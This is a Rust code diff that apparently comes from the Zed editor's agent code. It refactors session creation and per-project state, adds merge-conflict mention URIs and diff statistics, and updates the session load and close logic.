+
+ fn create_session(
+ self: Rc<Self>,
+ session_id: acp::SessionId,
+ project: Entity<Project>,
+ work_dirs: PathList,
+ title: Option<SharedString>,
+ cx: &mut gpui::App,
+ ) -> Entity<AcpThread> {
+ let action_log = cx.new(|_| ActionLog::new(project.clone()));
+ let thread = cx.new(|cx| {
+ AcpThread::new(
+ None,
+ title,
+ Some(work_dirs),
+ self.clone(),
+ project,
+ action_log,
+ session_id.clone(),
+ watch::Receiver::constant(
+ acp::PromptCapabilities::new()
+ .image(true)
+ .audio(true)
+ .embedded_context(true),
+ ),
+ cx,
+ )
+ });
+ self.sessions.lock().insert(
+ session_id,
+ Session {
+ thread: thread.downgrade(),
+ response_tx: None,
+ },
+ );
+ thread
+ }
+
pub fn send_update(
&self,
session_id: acp::SessionId,
@@ -603,8 +798,12 @@ mod test_support {
}
impl AgentConnection for StubAgentConnection {
+ fn agent_id(&self) -> AgentId {
+ self.agent_id.clone()
+ }
+
fn telemetry_id(&self) -> SharedString {
- "stub".into()
+ self.telemetry_id.clone()
}
fn auth_methods(&self) -> &[acp::AuthMethod] {
@@ -621,38 +820,33 @@ mod test_support {
fn new_session(
self: Rc<Self>,
project: Entity<Project>,
- cwd: &Path,
+ work_dirs: PathList,
cx: &mut gpui::App,
) -> Task<gpui::Result<Entity<AcpThread>>> {
static NEXT_SESSION_ID: AtomicUsize = AtomicUsize::new(0);
let session_id =
acp::SessionId::new(NEXT_SESSION_ID.fetch_add(1, Ordering::SeqCst).to_string());
- let action_log = cx.new(|_| ActionLog::new(project.clone()));
- let thread = cx.new(|cx| {
- AcpThread::new(
- None,
- "Test",
- Some(cwd.to_path_buf()),
- self.clone(),
- project,
- action_log,
- session_id.clone(),
- watch::Receiver::constant(
- acp::PromptCapabilities::new()
- .image(true)
- .audio(true)
- .embedded_context(true),
- ),
- cx,
- )
- });
- self.sessions.lock().insert(
- session_id,
- Session {
- thread: thread.downgrade(),
- response_tx: None,
- },
- );
+ let thread = self.create_session(session_id, project, work_dirs, None, cx);
+ Task::ready(Ok(thread))
+ }
+
+ fn supports_load_session(&self) -> bool {
+ self.supports_load_session
+ }
+
+ fn load_session(
+ self: Rc<Self>,
+ session_id: acp::SessionId,
+ project: Entity<Project>,
+ work_dirs: PathList,
+ title: Option<SharedString>,
+ cx: &mut App,
+ ) -> Task<Result<Entity<AcpThread>>> {
+ if !self.supports_load_session {
+ return Task::ready(Err(anyhow::Error::msg("Loading sessions is not supported")));
+ }
+
+ let thread = self.create_session(session_id, project, work_dirs, title, cx);
Task::ready(Ok(thread))
}
@@ -60,6 +60,9 @@ pub enum MentionUri {
GitDiff {
base_ref: String,
},
+ MergeConflict {
+ file_path: String,
+ },
}
impl MentionUri {
@@ -215,6 +218,9 @@ impl MentionUri {
let base_ref =
single_query_param(&url, "base")?.unwrap_or_else(|| "main".to_string());
Ok(Self::GitDiff { base_ref })
+ } else if path.starts_with("/agent/merge-conflict") {
+ let file_path = single_query_param(&url, "path")?.unwrap_or_default();
+ Ok(Self::MergeConflict { file_path })
} else {
bail!("invalid zed url: {:?}", input);
}
@@ -245,6 +251,13 @@ impl MentionUri {
}
}
MentionUri::GitDiff { base_ref } => format!("Branch Diff ({})", base_ref),
+ MentionUri::MergeConflict { file_path } => {
+ let name = Path::new(file_path)
+ .file_name()
+ .unwrap_or_default()
+ .to_string_lossy();
+ format!("Merge Conflict ({name})")
+ }
MentionUri::Selection {
abs_path: path,
line_range,
@@ -306,6 +319,7 @@ impl MentionUri {
MentionUri::Selection { .. } => IconName::Reader.path().into(),
MentionUri::Fetch { .. } => IconName::ToolWeb.path().into(),
MentionUri::GitDiff { .. } => IconName::GitBranch.path().into(),
+ MentionUri::MergeConflict { .. } => IconName::GitMergeConflict.path().into(),
}
}
@@ -409,6 +423,11 @@ impl MentionUri {
url.query_pairs_mut().append_pair("base", base_ref);
url
}
+ MentionUri::MergeConflict { file_path } => {
+ let mut url = Url::parse("zed:///agent/merge-conflict").unwrap();
+ url.query_pairs_mut().append_pair("path", file_path);
+ url
+ }
}
}
}
@@ -14,7 +14,7 @@ use gpui::{
};
use language::LanguageRegistry;
use markdown::{CodeBlockRenderer, Markdown, MarkdownElement, MarkdownStyle};
-use project::Project;
+use project::{AgentId, Project};
use settings::Settings;
use theme::ThemeSettings;
use ui::{CopyButton, Tooltip, WithScrollbar, prelude::*};
@@ -48,7 +48,7 @@ pub struct AcpConnectionRegistry {
}
struct ActiveConnection {
- server_name: SharedString,
+ agent_id: AgentId,
connection: Weak<acp::ClientSideConnection>,
}
@@ -65,12 +65,12 @@ impl AcpConnectionRegistry {
pub fn set_active_connection(
&self,
- server_name: impl Into<SharedString>,
+ agent_id: AgentId,
connection: &Rc<acp::ClientSideConnection>,
cx: &mut Context<Self>,
) {
self.active_connection.replace(Some(ActiveConnection {
- server_name: server_name.into(),
+ agent_id,
connection: Rc::downgrade(connection),
}));
cx.notify();
@@ -87,7 +87,7 @@ struct AcpTools {
}
struct WatchedConnection {
- server_name: SharedString,
+ agent_id: AgentId,
messages: Vec<WatchedConnectionMessage>,
list_state: ListState,
connection: Weak<acp::ClientSideConnection>,
@@ -144,7 +144,7 @@ impl AcpTools {
});
self.watched_connection = Some(WatchedConnection {
- server_name: active_connection.server_name.clone(),
+ agent_id: active_connection.agent_id.clone(),
messages: vec![],
list_state: ListState::new(0, ListAlignment::Bottom, px(2048.)),
connection: active_connection.connection.clone(),
@@ -483,7 +483,7 @@ impl Item for AcpTools {
"ACP: {}",
self.watched_connection
.as_ref()
- .map_or("Disconnected", |connection| &connection.server_name)
+ .map_or("Disconnected", |connection| connection.agent_id.0.as_ref())
)
.into()
}
@@ -209,7 +209,7 @@ impl ActionLog {
cx: &mut Context<Self>,
) {
match event {
- BufferEvent::Edited => {
+ BufferEvent::Edited { .. } => {
let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else {
return;
};
@@ -1028,6 +1028,11 @@ impl ActionLog {
.collect()
}
+ /// Returns the total number of lines added and removed across all unreviewed buffers.
+ pub fn diff_stats(&self, cx: &App) -> DiffStats {
+ DiffStats::all_files(&self.changed_buffers(cx), cx)
+ }
+
/// Iterate over buffers changed since last read or edited by the model
pub fn stale_buffers<'a>(&'a self, cx: &'a App) -> impl Iterator<Item = &'a Entity<Buffer>> {
self.tracked_buffers
@@ -1044,6 +1049,46 @@ impl ActionLog {
}
}
+#[derive(Default, Debug, Clone, Copy)]
+pub struct DiffStats {
+ pub lines_added: u32,
+ pub lines_removed: u32,
+}
+
+impl DiffStats {
+ pub fn single_file(buffer: &Buffer, diff: &BufferDiff, cx: &App) -> Self {
+ let mut stats = DiffStats::default();
+ let diff_snapshot = diff.snapshot(cx);
+ let buffer_snapshot = buffer.snapshot();
+ let base_text = diff_snapshot.base_text();
+
+ for hunk in diff_snapshot.hunks(&buffer_snapshot) {
+ let added_rows = hunk.range.end.row.saturating_sub(hunk.range.start.row);
+ stats.lines_added += added_rows;
+
+ let base_start = hunk.diff_base_byte_range.start.to_point(base_text).row;
+ let base_end = hunk.diff_base_byte_range.end.to_point(base_text).row;
+ let removed_rows = base_end.saturating_sub(base_start);
+ stats.lines_removed += removed_rows;
+ }
+
+ stats
+ }
+
+ pub fn all_files(
+ changed_buffers: &BTreeMap<Entity<Buffer>, Entity<BufferDiff>>,
+ cx: &App,
+ ) -> Self {
+ let mut total = DiffStats::default();
+ for (buffer, diff) in changed_buffers {
+ let stats = DiffStats::single_file(buffer.read(cx), diff.read(cx), cx);
+ total.lines_added += stats.lines_added;
+ total.lines_removed += stats.lines_removed;
+ }
+ total
+ }
+}
+
#[derive(Clone)]
pub struct ActionLogTelemetry {
pub agent_telemetry_id: SharedString,
@@ -37,10 +37,11 @@ use futures::channel::{mpsc, oneshot};
use futures::future::Shared;
use futures::{FutureExt as _, StreamExt as _, future};
use gpui::{
- App, AppContext, AsyncApp, Context, Entity, SharedString, Subscription, Task, WeakEntity,
+ App, AppContext, AsyncApp, Context, Entity, EntityId, SharedString, Subscription, Task,
+ WeakEntity,
};
use language_model::{IconOrSvg, LanguageModel, LanguageModelProvider, LanguageModelRegistry};
-use project::{Project, ProjectItem, ProjectPath, Worktree};
+use project::{AgentId, Project, ProjectItem, ProjectPath, Worktree};
use prompt_store::{
ProjectContext, PromptStore, RULES_FILE_NAMES, RulesFileContext, UserRulesContext,
WorktreeContext,
@@ -48,9 +49,9 @@ use prompt_store::{
use serde::{Deserialize, Serialize};
use settings::{LanguageModelSelection, update_settings_file};
use std::any::Any;
-use std::path::{Path, PathBuf};
+use std::path::PathBuf;
use std::rc::Rc;
-use std::sync::Arc;
+use std::sync::{Arc, LazyLock};
use util::ResultExt;
use util::path_list::PathList;
use util::rel_path::RelPath;
@@ -65,13 +66,23 @@ pub struct RulesLoadingError {
pub message: SharedString,
}
+struct ProjectState {
+ project: Entity<Project>,
+ project_context: Entity<ProjectContext>,
+ project_context_needs_refresh: watch::Sender<()>,
+ _maintain_project_context: Task<Result<()>>,
+ context_server_registry: Entity<ContextServerRegistry>,
+ _subscriptions: Vec<Subscription>,
+}
+
/// Holds both the internal Thread and the AcpThread for a session
struct Session {
/// The internal thread that processes messages
thread: Entity<Thread>,
/// The ACP thread that handles protocol communication
acp_thread: Entity<acp_thread::AcpThread>,
- pending_save: Task<()>,
+ project_id: EntityId,
+ pending_save: Task<Result<()>>,
_subscriptions: Vec<Subscription>,
}
@@ -235,79 +246,47 @@ pub struct NativeAgent {
/// Session ID -> Session mapping
sessions: HashMap<acp::SessionId, Session>,
thread_store: Entity<ThreadStore>,
- /// Shared project context for all threads
- project_context: Entity<ProjectContext>,
- project_context_needs_refresh: watch::Sender<()>,
- _maintain_project_context: Task<Result<()>>,
- context_server_registry: Entity<ContextServerRegistry>,
+ /// Project-specific state keyed by project EntityId
+ projects: HashMap<EntityId, ProjectState>,
/// Shared templates for all threads
templates: Arc<Templates>,
/// Cached model information
models: LanguageModels,
- project: Entity<Project>,
prompt_store: Option<Entity<PromptStore>>,
fs: Arc<dyn Fs>,
_subscriptions: Vec<Subscription>,
}
impl NativeAgent {
- pub async fn new(
- project: Entity<Project>,
+ pub fn new(
thread_store: Entity<ThreadStore>,
templates: Arc<Templates>,
prompt_store: Option<Entity<PromptStore>>,
fs: Arc<dyn Fs>,
- cx: &mut AsyncApp,
- ) -> Result<Entity<NativeAgent>> {
+ cx: &mut App,
+ ) -> Entity<NativeAgent> {
log::debug!("Creating new NativeAgent");
- let project_context = cx
- .update(|cx| Self::build_project_context(&project, prompt_store.as_ref(), cx))
- .await;
-
- Ok(cx.new(|cx| {
- let context_server_store = project.read(cx).context_server_store();
- let context_server_registry =
- cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx));
-
- let mut subscriptions = vec![
- cx.subscribe(&project, Self::handle_project_event),
- cx.subscribe(
- &LanguageModelRegistry::global(cx),
- Self::handle_models_updated_event,
- ),
- cx.subscribe(
- &context_server_store,
- Self::handle_context_server_store_updated,
- ),
- cx.subscribe(
- &context_server_registry,
- Self::handle_context_server_registry_event,
- ),
- ];
+ cx.new(|cx| {
+ let mut subscriptions = vec![cx.subscribe(
+ &LanguageModelRegistry::global(cx),
+ Self::handle_models_updated_event,
+ )];
if let Some(prompt_store) = prompt_store.as_ref() {
subscriptions.push(cx.subscribe(prompt_store, Self::handle_prompts_updated_event))
}
- let (project_context_needs_refresh_tx, project_context_needs_refresh_rx) =
- watch::channel(());
Self {
sessions: HashMap::default(),
thread_store,
- project_context: cx.new(|_| project_context),
- project_context_needs_refresh: project_context_needs_refresh_tx,
- _maintain_project_context: cx.spawn(async move |this, cx| {
- Self::maintain_project_context(this, project_context_needs_refresh_rx, cx).await
- }),
- context_server_registry,
+ projects: HashMap::default(),
templates,
models: LanguageModels::new(cx),
- project,
prompt_store,
fs,
_subscriptions: subscriptions,
}
- }))
+ })
}
fn new_session(
@@ -315,10 +294,10 @@ impl NativeAgent {
project: Entity<Project>,
cx: &mut Context<Self>,
) -> Entity<AcpThread> {
- // Create Thread
- // Fetch default model from registry settings
+ let project_id = self.get_or_create_project_state(&project, cx);
+ let project_state = &self.projects[&project_id];
+
let registry = LanguageModelRegistry::read_global(cx);
- // Log available models for debugging
let available_count = registry.available_models(cx).count();
log::debug!("Total available models: {}", available_count);
@@ -328,21 +307,22 @@ impl NativeAgent {
});
let thread = cx.new(|cx| {
Thread::new(
- project.clone(),
- self.project_context.clone(),
- self.context_server_registry.clone(),
+ project,
+ project_state.project_context.clone(),
+ project_state.context_server_registry.clone(),
self.templates.clone(),
default_model,
cx,
)
});
- self.register_session(thread, cx)
+ self.register_session(thread, project_id, cx)
}
fn register_session(
&mut self,
thread_handle: Entity<Thread>,
+ project_id: EntityId,
cx: &mut Context<Self>,
) -> Entity<AcpThread> {
let connection = Rc::new(NativeAgentConnection(cx.entity()));
@@ -405,12 +385,13 @@ impl NativeAgent {
Session {
thread: thread_handle,
acp_thread: acp_thread.clone(),
+ project_id,
_subscriptions: subscriptions,
- pending_save: Task::ready(()),
+ pending_save: Task::ready(Ok(())),
},
);
- self.update_available_commands(cx);
+ self.update_available_commands_for_project(project_id, cx);
acp_thread
}
@@ -419,19 +400,106 @@ impl NativeAgent {
&self.models
}
+ fn get_or_create_project_state(
+ &mut self,
+ project: &Entity<Project>,
+ cx: &mut Context<Self>,
+ ) -> EntityId {
+ let project_id = project.entity_id();
+ if self.projects.contains_key(&project_id) {
+ return project_id;
+ }
+
+ let project_context = cx.new(|_| ProjectContext::new(vec![], vec![]));
+ self.register_project_with_initial_context(project.clone(), project_context, cx);
+ if let Some(state) = self.projects.get_mut(&project_id) {
+ state.project_context_needs_refresh.send(()).ok();
+ }
+ project_id
+ }
+
+ fn register_project_with_initial_context(
+ &mut self,
+ project: Entity<Project>,
+ project_context: Entity<ProjectContext>,
+ cx: &mut Context<Self>,
+ ) {
+ let project_id = project.entity_id();
+
+ let context_server_store = project.read(cx).context_server_store();
+ let context_server_registry =
+ cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx));
+
+ let subscriptions = vec![
+ cx.subscribe(&project, Self::handle_project_event),
+ cx.subscribe(
+ &context_server_store,
+ Self::handle_context_server_store_updated,
+ ),
+ cx.subscribe(
+ &context_server_registry,
+ Self::handle_context_server_registry_event,
+ ),
+ ];
+
+ let (project_context_needs_refresh_tx, project_context_needs_refresh_rx) =
+ watch::channel(());
+
+ self.projects.insert(
+ project_id,
+ ProjectState {
+ project,
+ project_context,
+ project_context_needs_refresh: project_context_needs_refresh_tx,
+ _maintain_project_context: cx.spawn(async move |this, cx| {
+ Self::maintain_project_context(
+ this,
+ project_id,
+ project_context_needs_refresh_rx,
+ cx,
+ )
+ .await
+ }),
+ context_server_registry,
+ _subscriptions: subscriptions,
+ },
+ );
+ }
+
+ fn session_project_state(&self, session_id: &acp::SessionId) -> Option<&ProjectState> {
+ self.sessions
+ .get(session_id)
+ .and_then(|session| self.projects.get(&session.project_id))
+ }
+
async fn maintain_project_context(
this: WeakEntity<Self>,
+ project_id: EntityId,
mut needs_refresh: watch::Receiver<()>,
cx: &mut AsyncApp,
) -> Result<()> {
while needs_refresh.changed().await.is_ok() {
let project_context = this
.update(cx, |this, cx| {
- Self::build_project_context(&this.project, this.prompt_store.as_ref(), cx)
- })?
+ let state = this
+ .projects
+ .get(&project_id)
+ .context("project state not found")?;
+ anyhow::Ok(Self::build_project_context(
+ &state.project,
+ this.prompt_store.as_ref(),
+ cx,
+ ))
+ })??
.await;
this.update(cx, |this, cx| {
- this.project_context = cx.new(|_| project_context);
+ if let Some(state) = this.projects.get(&project_id) {
+ state
+ .project_context
+ .update(cx, |current_project_context, _cx| {
+ *current_project_context = project_context;
+ });
+ }
})?;
}
@@ -594,14 +662,16 @@ impl NativeAgent {
let Some(session) = self.sessions.get(session_id) else {
return;
};
- let thread = thread.downgrade();
- let acp_thread = session.acp_thread.downgrade();
- cx.spawn(async move |_, cx| {
- let title = thread.read_with(cx, |thread, _| thread.title())?;
- let task = acp_thread.update(cx, |acp_thread, cx| acp_thread.set_title(title, cx))?;
- task.await
- })
- .detach_and_log_err(cx);
+
+ if let Some(title) = thread.read(cx).title() {
+ let acp_thread = session.acp_thread.downgrade();
+ cx.spawn(async move |_, cx| {
+ let task =
+ acp_thread.update(cx, |acp_thread, cx| acp_thread.set_title(title, cx))?;
+ task.await
+ })
+ .detach_and_log_err(cx);
+ }
}
fn handle_thread_token_usage_updated(
@@ -620,13 +690,17 @@ impl NativeAgent {
fn handle_project_event(
&mut self,
- _project: Entity<Project>,
+ project: Entity<Project>,
event: &project::Event,
_cx: &mut Context<Self>,
) {
+ let project_id = project.entity_id();
+ let Some(state) = self.projects.get_mut(&project_id) else {
+ return;
+ };
match event {
project::Event::WorktreeAdded(_) | project::Event::WorktreeRemoved(_) => {
- self.project_context_needs_refresh.send(()).ok();
+ state.project_context_needs_refresh.send(()).ok();
}
project::Event::WorktreeUpdatedEntries(_, items) => {
if items.iter().any(|(path, _, _)| {
@@ -634,7 +708,7 @@ impl NativeAgent {
.iter()
.any(|name| path.as_ref() == RelPath::unix(name).unwrap())
}) {
- self.project_context_needs_refresh.send(()).ok();
+ state.project_context_needs_refresh.send(()).ok();
}
}
_ => {}
@@ -647,13 +721,15 @@ impl NativeAgent {
_event: &prompt_store::PromptsUpdatedEvent,
_cx: &mut Context<Self>,
) {
- self.project_context_needs_refresh.send(()).ok();
+ for state in self.projects.values_mut() {
+ state.project_context_needs_refresh.send(()).ok();
+ }
}
fn handle_models_updated_event(
&mut self,
_registry: Entity<LanguageModelRegistry>,
- _event: &language_model::Event,
+ event: &language_model::Event,
cx: &mut Context<Self>,
) {
self.models.refresh_list(cx);
@@ -670,37 +746,65 @@ impl NativeAgent {
thread.set_model(model, cx);
cx.notify();
}
- thread.set_summarization_model(summarization_model.clone(), cx);
+ if let Some(model) = summarization_model.clone() {
+ if thread.summarization_model().is_none()
+ || matches!(event, language_model::Event::ThreadSummaryModelChanged)
+ {
+ thread.set_summarization_model(Some(model), cx);
+ }
+ }
});
}
}
fn handle_context_server_store_updated(
&mut self,
- _store: Entity<project::context_server_store::ContextServerStore>,
+ store: Entity<project::context_server_store::ContextServerStore>,
_event: &project::context_server_store::ServerStatusChangedEvent,
cx: &mut Context<Self>,
) {
- self.update_available_commands(cx);
+ let project_id = self.projects.iter().find_map(|(id, state)| {
+ if *state.context_server_registry.read(cx).server_store() == store {
+ Some(*id)
+ } else {
+ None
+ }
+ });
+ if let Some(project_id) = project_id {
+ self.update_available_commands_for_project(project_id, cx);
+ }
}
fn handle_context_server_registry_event(
&mut self,
- _registry: Entity<ContextServerRegistry>,
+ registry: Entity<ContextServerRegistry>,
event: &ContextServerRegistryEvent,
cx: &mut Context<Self>,
) {
match event {
ContextServerRegistryEvent::ToolsChanged => {}
ContextServerRegistryEvent::PromptsChanged => {
- self.update_available_commands(cx);
+ let project_id = self.projects.iter().find_map(|(id, state)| {
+ if state.context_server_registry == registry {
+ Some(*id)
+ } else {
+ None
+ }
+ });
+ if let Some(project_id) = project_id {
+ self.update_available_commands_for_project(project_id, cx);
+ }
}
}
}
- fn update_available_commands(&self, cx: &mut Context<Self>) {
- let available_commands = self.build_available_commands(cx);
+ fn update_available_commands_for_project(&self, project_id: EntityId, cx: &mut Context<Self>) {
+ let available_commands =
+ Self::build_available_commands_for_project(self.projects.get(&project_id), cx);
for session in self.sessions.values() {
+ if session.project_id != project_id {
+ continue;
+ }
session.acp_thread.update(cx, |thread, cx| {
thread
.handle_session_update(
@@ -714,8 +818,14 @@ impl NativeAgent {
}
}
- fn build_available_commands(&self, cx: &App) -> Vec<acp::AvailableCommand> {
- let registry = self.context_server_registry.read(cx);
+ fn build_available_commands_for_project(
+ project_state: Option<&ProjectState>,
+ cx: &App,
+ ) -> Vec<acp::AvailableCommand> {
+ let Some(state) = project_state else {
+ return vec![];
+ };
+ let registry = state.context_server_registry.read(cx);
let mut prompt_name_counts: HashMap<&str, usize> = HashMap::default();
for context_server_prompt in registry.prompts() {
@@ -769,6 +879,7 @@ impl NativeAgent {
pub fn load_thread(
&mut self,
id: acp::SessionId,
+ project: Entity<Project>,
cx: &mut Context<Self>,
) -> Task<Result<Entity<Thread>>> {
let database_future = ThreadsDatabase::connect(cx);
@@ -780,41 +891,49 @@ impl NativeAgent {
.with_context(|| format!("no thread found with ID: {id:?}"))?;
this.update(cx, |this, cx| {
+ let project_id = this.get_or_create_project_state(&project, cx);
+ let project_state = this
+ .projects
+ .get(&project_id)
+ .context("project state not found")?;
let summarization_model = LanguageModelRegistry::read_global(cx)
.thread_summary_model()
.map(|c| c.model);
- cx.new(|cx| {
+ Ok(cx.new(|cx| {
let mut thread = Thread::from_db(
id.clone(),
db_thread,
- this.project.clone(),
- this.project_context.clone(),
- this.context_server_registry.clone(),
+ project_state.project.clone(),
+ project_state.project_context.clone(),
+ project_state.context_server_registry.clone(),
this.templates.clone(),
cx,
);
thread.set_summarization_model(summarization_model, cx);
thread
- })
- })
+ }))
+ })?
})
}
pub fn open_thread(
&mut self,
id: acp::SessionId,
+ project: Entity<Project>,
cx: &mut Context<Self>,
) -> Task<Result<Entity<AcpThread>>> {
if let Some(session) = self.sessions.get(&id) {
return Task::ready(Ok(session.acp_thread.clone()));
}
- let task = self.load_thread(id, cx);
+ let task = self.load_thread(id, project.clone(), cx);
cx.spawn(async move |this, cx| {
let thread = task.await?;
- let acp_thread =
- this.update(cx, |this, cx| this.register_session(thread.clone(), cx))?;
+ let acp_thread = this.update(cx, |this, cx| {
+ let project_id = this.get_or_create_project_state(&project, cx);
+ this.register_session(thread.clone(), project_id, cx)
+ })?;
let events = thread.update(cx, |thread, cx| thread.replay(cx));
cx.update(|cx| {
NativeAgentConnection::handle_thread_events(events, acp_thread.downgrade(), cx)
@@ -827,9 +946,10 @@ impl NativeAgent {
pub fn thread_summary(
&mut self,
id: acp::SessionId,
+ project: Entity<Project>,
cx: &mut Context<Self>,
) -> Task<Result<SharedString>> {
- let thread = self.open_thread(id.clone(), cx);
+ let thread = self.open_thread(id.clone(), project, cx);
cx.spawn(async move |this, cx| {
let acp_thread = thread.await?;
let result = this
@@ -857,8 +977,13 @@ impl NativeAgent {
return;
};
+ let project_id = session.project_id;
+ let Some(state) = self.projects.get(&project_id) else {
+ return;
+ };
+
let folder_paths = PathList::new(
- &self
+ &state
.project
.read(cx)
.visible_worktrees(cx)
@@ -875,7 +1000,7 @@ impl NativeAgent {
let thread_store = self.thread_store.clone();
session.pending_save = cx.spawn(async move |_, cx| {
let Some(database) = database_future.await.map_err(|err| anyhow!(err)).log_err() else {
- return;
+ return Ok(());
};
let db_thread = db_thread.await;
database
@@ -883,21 +1008,29 @@ impl NativeAgent {
.await
.log_err();
thread_store.update(cx, |store, cx| store.reload(cx));
+ Ok(())
});
}
fn send_mcp_prompt(
&self,
message_id: UserMessageId,
- session_id: agent_client_protocol::SessionId,
+ session_id: acp::SessionId,
prompt_name: String,
server_id: ContextServerId,
arguments: HashMap<String, String>,
original_content: Vec<acp::ContentBlock>,
cx: &mut Context<Self>,
) -> Task<Result<acp::PromptResponse>> {
- let server_store = self.context_server_registry.read(cx).server_store().clone();
- let path_style = self.project.read(cx).path_style(cx);
+ let Some(state) = self.session_project_state(&session_id) else {
+ return Task::ready(Err(anyhow!("Project state not found for session")));
+ };
+ let server_store = state
+ .context_server_registry
+ .read(cx)
+ .server_store()
+ .clone();
+ let path_style = state.project.read(cx).path_style(cx);
cx.spawn(async move |this, cx| {
let prompt =
@@ -996,8 +1129,14 @@ impl NativeAgentConnection {
.map(|session| session.thread.clone())
}
- pub fn load_thread(&self, id: acp::SessionId, cx: &mut App) -> Task<Result<Entity<Thread>>> {
- self.0.update(cx, |this, cx| this.load_thread(id, cx))
+ pub fn load_thread(
+ &self,
+ id: acp::SessionId,
+ project: Entity<Project>,
+ cx: &mut App,
+ ) -> Task<Result<Entity<Thread>>> {
+ self.0
+ .update(cx, |this, cx| this.load_thread(id, project, cx))
}
fn run_turn(
@@ -1068,12 +1207,11 @@ impl NativeAgentConnection {
thread.request_tool_call_authorization(tool_call, options, cx)
})??;
cx.background_spawn(async move {
- if let acp::RequestPermissionOutcome::Selected(
- acp::SelectedPermissionOutcome { option_id, .. },
- ) = outcome_task.await
+ if let acp_thread::RequestPermissionOutcome::Selected(outcome) =
+ outcome_task.await
{
response
- .send(option_id)
+ .send(outcome)
.map(|_| anyhow!("authorization receiver was dropped"))
.log_err();
}
@@ -1090,6 +1228,9 @@ impl NativeAgentConnection {
thread.update_tool_call(update, cx)
})??;
}
+ ThreadEvent::Plan(plan) => {
+ acp_thread.update(cx, |thread, cx| thread.update_plan(plan, cx))?;
+ }
ThreadEvent::SubagentSpawned(session_id) => {
acp_thread.update(cx, |thread, cx| {
thread.subagent_spawned(session_id, cx);
@@ -1255,7 +1396,13 @@ impl acp_thread::AgentModelSelector for NativeAgentModelSelector {
}
}
+pub static ZED_AGENT_ID: LazyLock<AgentId> = LazyLock::new(|| AgentId::new("Zed Agent"));
+
impl acp_thread::AgentConnection for NativeAgentConnection {
+ fn agent_id(&self) -> AgentId {
+ ZED_AGENT_ID.clone()
+ }
+
fn telemetry_id(&self) -> SharedString {
"zed".into()
}
@@ -1263,10 +1410,10 @@ impl acp_thread::AgentConnection for NativeAgentConnection {
fn new_session(
self: Rc<Self>,
project: Entity<Project>,
- cwd: &Path,
+ work_dirs: PathList,
cx: &mut App,
) -> Task<Result<Entity<acp_thread::AcpThread>>> {
- log::debug!("Creating new thread for project at: {cwd:?}");
+ log::debug!("Creating new thread for project at: {work_dirs:?}");
Task::ready(Ok(self
.0
.update(cx, |agent, cx| agent.new_session(project, cx))))
@@ -1279,24 +1426,42 @@ impl acp_thread::AgentConnection for NativeAgentConnection {
fn load_session(
self: Rc<Self>,
session_id: acp::SessionId,
- _project: Entity<Project>,
- _cwd: &Path,
+ project: Entity<Project>,
+ _work_dirs: PathList,
_title: Option<SharedString>,
cx: &mut App,
) -> Task<Result<Entity<acp_thread::AcpThread>>> {
self.0
- .update(cx, |agent, cx| agent.open_thread(session_id, cx))
+ .update(cx, |agent, cx| agent.open_thread(session_id, project, cx))
}
fn supports_close_session(&self) -> bool {
true
}
- fn close_session(&self, session_id: &acp::SessionId, cx: &mut App) -> Task<Result<()>> {
- self.0.update(cx, |agent, _cx| {
- agent.sessions.remove(session_id);
- });
- Task::ready(Ok(()))
+ fn close_session(
+ self: Rc<Self>,
+ session_id: &acp::SessionId,
+ cx: &mut App,
+ ) -> Task<Result<()>> {
+ self.0.update(cx, |agent, cx| {
+ let thread = agent.sessions.get(session_id).map(|s| s.thread.clone());
+ if let Some(thread) = thread {
+ agent.save_thread(thread, cx);
+ }
+
+ let Some(session) = agent.sessions.remove(session_id) else {
+ return Task::ready(Ok(()));
+ };
+ let project_id = session.project_id;
+
+ let has_remaining = agent.sessions.values().any(|s| s.project_id == project_id);
+ if !has_remaining {
+ agent.projects.remove(&project_id);
+ }
+
+ session.pending_save
+ })
}
fn auth_methods(&self) -> &[acp::AuthMethod] {
@@ -1325,8 +1490,12 @@ impl acp_thread::AgentConnection for NativeAgentConnection {
log::info!("Received prompt request for session: {}", session_id);
log::debug!("Prompt blocks count: {}", params.prompt.len());
+ let Some(project_state) = self.0.read(cx).session_project_state(&session_id) else {
+ return Task::ready(Err(anyhow::anyhow!("Session not found")));
+ };
+
+ if let Some(parsed_command) = Command::parse(&params.prompt) {
- let registry = self.0.read(cx).context_server_registry.read(cx);
+ let registry = project_state.context_server_registry.read(cx);
let explicit_server_id = parsed_command
.explicit_server_id
@@ -1362,10 +1531,10 @@ impl acp_thread::AgentConnection for NativeAgentConnection {
cx,
)
});
- };
+ }
};
- let path_style = self.0.read(cx).project.read(cx).path_style(cx);
+ let path_style = project_state.project.read(cx).path_style(cx);
self.run_turn(session_id, cx, move |thread, cx| {
let content: Vec<UserMessageContent> = params
@@ -1406,7 +1575,7 @@ impl acp_thread::AgentConnection for NativeAgentConnection {
fn truncate(
&self,
- session_id: &agent_client_protocol::SessionId,
+ session_id: &acp::SessionId,
cx: &App,
) -> Option<Rc<dyn acp_thread::AgentSessionTruncate>> {
self.0.read_with(cx, |agent, _cx| {
@@ -1611,6 +1780,7 @@ impl NativeThreadEnvironment {
};
let parent_thread = parent_thread_entity.read(cx);
let current_depth = parent_thread.depth();
+ let parent_session_id = parent_thread.id().clone();
if current_depth >= MAX_SUBAGENT_DEPTH {
return Err(anyhow!(
@@ -1627,9 +1797,16 @@ impl NativeThreadEnvironment {
let session_id = subagent_thread.read(cx).id().clone();
- let acp_thread = self.agent.update(cx, |agent, cx| {
- agent.register_session(subagent_thread.clone(), cx)
- })?;
+ let acp_thread = self
+ .agent
+ .update(cx, |agent, cx| -> Result<Entity<AcpThread>> {
+ let project_id = agent
+ .sessions
+ .get(&parent_session_id)
+ .map(|s| s.project_id)
+ .context("parent session not found")?;
+ Ok(agent.register_session(subagent_thread.clone(), project_id, cx))
+ })??;
let depth = current_depth + 1;
@@ -1929,6 +2106,8 @@ impl TerminalHandle for AcpTerminalHandle {
#[cfg(test)]
mod internal_tests {
+ use std::path::Path;
+
use super::*;
use acp_thread::{AgentConnection, AgentModelGroupName, AgentModelInfo, MentionUri};
use fs::FakeFs;
@@ -1955,18 +2134,32 @@ mod internal_tests {
.await;
let project = Project::test(fs.clone(), [], cx).await;
let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let agent = NativeAgent::new(
- project.clone(),
- thread_store,
- Templates::new(),
- None,
- fs.clone(),
- &mut cx.to_async(),
- )
- .await
- .unwrap();
+ let agent =
+ cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx));
+
